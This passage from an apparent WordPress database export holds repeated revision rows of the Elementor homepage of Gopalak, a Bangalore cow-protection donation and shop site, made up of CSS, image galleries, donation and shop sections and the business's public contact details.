About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:01:01','2022-10-20 12:31:01','',1373,'https://gopalak.in/?p=1960',0,'revision','',0),(1961,1,'2022-10-20 18:01:01','2022-10-20 12:31:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:01:01','2022-10-20 12:31:01','',1373,'https://gopalak.in/?p=1961',0,'revision','',0),(1962,1,'2022-10-20 18:01:01','2022-10-20 12:31:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" 